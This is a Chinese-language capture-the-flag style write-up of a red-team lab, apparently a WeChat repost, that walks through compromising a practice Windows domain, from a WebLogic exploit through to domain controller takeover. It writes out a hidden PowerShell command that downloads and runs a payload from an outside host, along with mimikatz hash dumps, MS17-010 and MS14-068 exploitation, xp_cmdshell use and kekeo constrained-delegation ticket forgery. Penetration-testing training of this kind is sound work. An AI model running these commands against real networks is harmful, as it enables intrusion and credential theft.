靶场网络拓扑图
外网打点-web机上线
nmap端口扫描
访问7001端口,是weblogic的web服务端,使用weblogic利用工具进行检测,存在cve-2016-0638
写入webshell,网站目录在 C:OracleMiddlewareOracle_Homewlserverserverlibconsoleappwebapp下,这里注意写入js或者css等静态资源文件目录下,写在根目录下访问会跳转,注意webshell的兼容性,可能会报错
访问webshell
利用powershell远程下载执行上线cs
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.12:800/a.css'))"
因为这里是工作组环境,加上已经是administrator权限,所以没有提权细究,使用ping命令探测内网,发现另一台机子
for /l %i in (1,1,254) do @ping -w 1 -n 1 10.10.20.%i | findstr "TTL="
ms17_010盲打-win7上线
msf设置上层全局代理
对10.10.20.7进行盲打(有蓝屏机率)
上传cs的正向shell,先生成一个exe stage,这里尝试了生成服务的,但是连接失败了,exe可以上线
确定存在域环境
确定域控地址
mimikatz没有抓取到本地明文,应该是没有登陆过的原因,后面尝试域用户登陆了一次,才可以抓取带明文,这里直接抓取本地hash,在线查找破解,密码为admin!@#45
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
john:1000:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::
利用kerbrute使用破解得到的密码和net user /domain得到的用户进行密码喷洒,得到一个域用户和密码
查看网卡信息
ping探测
弱口令-sqlserver上线
端口扫描(这里因为环境问题,恢复了一次快照,才扫到了数据库的1433)
fscan指定端口爆破(其他数据库爆破工具也可以),凭证为sa sa
使用rpcon对mssql进行利用,xp_cmdshell命令执行
执行一些长命令和有各种符号的命令时比较麻烦,暂时没有找到合适顺手的正向代理工具,所以利用msf挂一个正向代理
因为win7对外不出网,但是win7和sqlserver这台机子互通,所以使用http-server工具在win7上开启一个建议http服务,用于存放生成的beacon,sqlserver这台机子使用certutil落地文件,上线cs
查看补丁信息,使用cve-2019-1458提升权限,有蓝屏机率,后面换成了ms14_058
mimikatz抓取明文密码
约束委派-访问域控
使用获取到的账户结合adfind查找约束委派用户,返回约束委派用户为sqlserver
AdFind.exe -h 10.10.10.8 -u sqlserver -up Server12345 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
利用约束委派进行攻击,执行kekeo时因为是直接在cs执行的,会一直出现kekeo # ERROR kull_m_cli_read ; ReadConsole (0x00000006)报错,注意进程情况自己kill掉(真实cmd终端下是交互式shell应该不会)
//请求TGT
//生成[email protected][email protected]文件
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345"
//伪造票据ticket
//生成[email protected]@[email protected]文件
//生成[email protected]@[email protected]文件
kekeo.exe "tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/owa.redteam.red"
//清空内存中的票据
klist purge
//mimikatz导入
mimikatz kerberos::ptt [email protected]@[email protected]
//验证,可能执行几次后就不行了,重复mimikatz那一步即可
dir \owac$
查看flag
ms14_068-域控上线
利用约束委派复制文件到域控,尝试了手动使用psexec以及wmic执行,但未成功,可能是约束委派的权限问题或者其他操作问题?
copy oo.exe \owac$userspublicoo.exe
psexec.exe -accepteula \10.10.10.8 c:userspublicoo.exe
查看c:windowswindowsupdate.log中的补丁信息,使用goldenPac.exe(ms14_068结合psexec)上线CS
得到的直接是system会话
参考链接
其他攻击方式参考:
渗透攻击红队靶场 | Laohuan's Blog
官方公众号参考:
从外网 Weblogic 打进内网,再到约束委派接管域控 (qq.com)
约束委派参考:
一篇文章讲清楚“什么是委派攻击” - FreeBuf网络安全行业门户
ms14_068参考
内网安全之:MS14-068 Kerberos 域用户提权漏洞 - f_carey - 博客园 (cnblogs.com)
原文始发于微信公众号(513 Sec):writeup-渗透攻击红队内网域渗透靶场-1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论